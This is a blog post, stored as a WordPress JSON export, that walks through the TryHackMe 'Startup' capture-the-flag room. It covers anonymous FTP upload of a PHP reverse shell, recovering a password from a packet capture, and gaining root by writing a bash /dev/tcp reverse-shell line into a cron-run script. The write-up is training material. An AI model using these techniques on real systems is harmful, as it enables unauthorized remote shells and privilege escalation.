{"id":457,"date":"2023-03-04T22:06:19","date_gmt":"2023-03-04T21:06:19","guid":{"rendered":"https:\/\/babdcatha.net\/?p=457"},"modified":"2023-03-05T00:22:41","modified_gmt":"2023-03-04T23:22:41","slug":"tryhackme-startup","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/03\/04\/tryhackme-startup\/","title":{"rendered":"TryHackMe : Startup"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hello people, today we take a look at the <a href=\"https:\/\/tryhackme.com\/room\/startup\">Startup<\/a> room on TryHackMe. This room is about a startup that wants to see if we can get into their system. Here are the different parts of this writeup if you want to skip ahead :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#first_access\">First access<\/a><\/li>\n\n\n\n<li><a href=\"#user_flag\">User flag<\/a><\/li>\n\n\n\n<li><a href=\"#getting_root\">Getting root<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"first_access\">First access<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">As usual, we start by running a full nmap scan on the target device :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1.png\" alt=\"\" class=\"wp-image-461\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/nmap-1-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This time, we can find a web server, an FTP server and the machine has SSH enabled. Let&#8217;s see what we can find on the FTP server if we connect as the anonymous user :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"612\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp.png\" alt=\"\" class=\"wp-image-463\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp-300x191.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/ftp-768x490.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Two files : <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">important.jpg<\/mark> and <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">notice.txt<\/mark>. Here is the image :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"735\" height=\"458\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/important.png\" alt=\"\" class=\"wp-image-465\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/important.png 735w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/important-300x187.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And the text files says :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Maybe <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">Maya<\/mark> is an user on this machine ? We should keep this name in mind.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In the meantime, we can take a look at the website :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"944\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site.png\" alt=\"\" class=\"wp-image-468\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site.png 962w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/initial_site-768x754.png 768w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Nothing fancy here, just a maintenance message. Let&#8217;s try to find hidden directories with gobuster :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster.png\" alt=\"\" class=\"wp-image-471\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/gobuster-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">One interesting result : the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/files<\/mark> directory. If we visit it, we see that it looks like a mirror for the ftp server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"473\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files.png\" alt=\"\" class=\"wp-image-472\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files.png 962w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files-300x148.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/website_files-768x378.png 768w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Not a lot to see here, the ftp directory is empty. Maybe we can use the ftp server to upload a php shell here ? Unfortunately, the anonymous account does not have permissions to create files on the server, so we&#8217;ll have to find another way in.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">What can we try next ? Maybe Maya has a weak password ? Let&#8217;s try it on the ftp server first : nothing. On the SSH server : nothing either. We must have missed something !<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When we checked for write permission on the FTP server, we only looked at the main folder, but, if we try to upload something to the ftp folder, we succeed ! That means that we can now upload our php shell and execute it to get a reverse shell :<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Once we uploaded our payload, we visit <a href=\"http:\/\/$MACHINE_IP\/files\/ftp\/shell.phtml\">http:\/\/$MACHINE_IP\/files\/ftp\/shell.phtml<\/a>, and we get our reverse shell as the www-data user, and, if we look at the root directory, we can see the secret ingredient used in their soup :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"822\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur.png\" alt=\"\" class=\"wp-image-481\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur-300x257.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/rev_shell_1_blur-768x658.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay ! We got our first flag. Now, it&#8217;s time to find the user flag !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"user_flag\">User flag<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">When looking around the system, we found another user : lennie, but we couldn&#8217;t access it&#8217;s home directory. We must find a way in.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">One thing immediately jumps out : there is an <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">incidents<\/mark> folder in the root directory, which contains a pcapng file. We can download by running<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">python3 -m http.server 4454<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">On the target machine, in the incidents directory, and the visiting <a href=\"http:\/\/$MACHINE_IP:4454\/\">http:\/\/$MACHINE_IP:4454\/<\/a>. We can now open it using Wireshark and analyze it. When we look at the seventh TCP stream (using the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">tcp.stream eq 7<\/mark> filter), we can see the command prompt a previous hacker seems to have used, and we see that the hacker tried to use a password for the www-data user, but that it didn&#8217;t work. This could be just a guess, but the password looks a bit too suspicious for that, maybe, he was actually using it on the wrong account ?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"752\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-1024x752.png\" alt=\"\" class=\"wp-image-485\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-1024x752.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-300x220.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur-768x564.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/wireshark_blur.png 1283w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And indeed, if we try to ssh into lennie&#8217;s session using this password, we get in ! we can now get the user flag :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"592\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur.png\" alt=\"\" class=\"wp-image-487\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur-300x185.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/user_flag_blur-768x474.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hurray, we now have 2\/3 flags, one more to go !<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"getting_root\">Getting root<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Now, we have to find a way to elevate our privileges. We unfortunately cannot run sudo on this machine as lennie, so that is out. When we look into out home directory, we find a <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">scripts<\/mark> directory, which contains scripts owned by root !<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">planner.sh :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">#!\/bin\/bash\necho $LIST > \/home\/lennie\/scripts\/startup_list.txt\n\/etc\/print.sh<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">startup_list.sh :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\"><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\/etc\/print.sh :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">#!\/bin\/bash\necho \"Done!\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">It looks like planner writes a list of commands into startup_list.sh, and, since we can control the $LIST environment variable, we can write anything we want into startup_list.sh, can&#8217;t we ? Well, the only problem is that startup_list.sh is owned by root and only modifiable by root, so this won&#8217;t help us here. We can write to \/etc\/print.sh, but what good does it make if root does not execute the script ? Let&#8217;s try to find out if this happens before modifying it. To do that, we can use <a href=\"https:\/\/github.com\/DominicBreuker\/pspy\">pspy<\/a> to see all the running processes on the machine, and hopefully see if root is running this script from time to time.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy.png\" alt=\"\" class=\"wp-image-499\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/pspy-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we can see that every minute, root executes the planner.sh script, which executes the print.sh script that we can modify. So, if we write a reverse shell into the latter, we should be able to get a root shell on our machine :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">echo \"bash -i >&amp; \/dev\/tcp\/$MACHINE_IP\/$PORT 0>&amp;1\" > \/etc\/print.sh<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And it works ! We can now read the last flag on this machine :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur.png\" alt=\"\" class=\"wp-image-501\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/03\/root_flag_blur-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay ! We completed this machine ! I hope you had fun, and that I will see you again here \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hello people, today we take a look at the Startup room on TryHackMe. This room is about a startup that wants to see if we can get into their system. Here are the different parts of this writeup if you want to skip ahead : First access As usual, we start by running a full [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[39,41,40,38,8,42],"class_list":["post-457","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-cronjobs","tag-ftp","tag-php","tag-pspy","tag-tryhackme","tag-wireshark"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/457","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=457"}],"version-history":[{"count":33,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/457\/revisions"}],"predecessor-version":[{"id":502,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/457\/revisions\/502"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=457"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=457"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=457"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}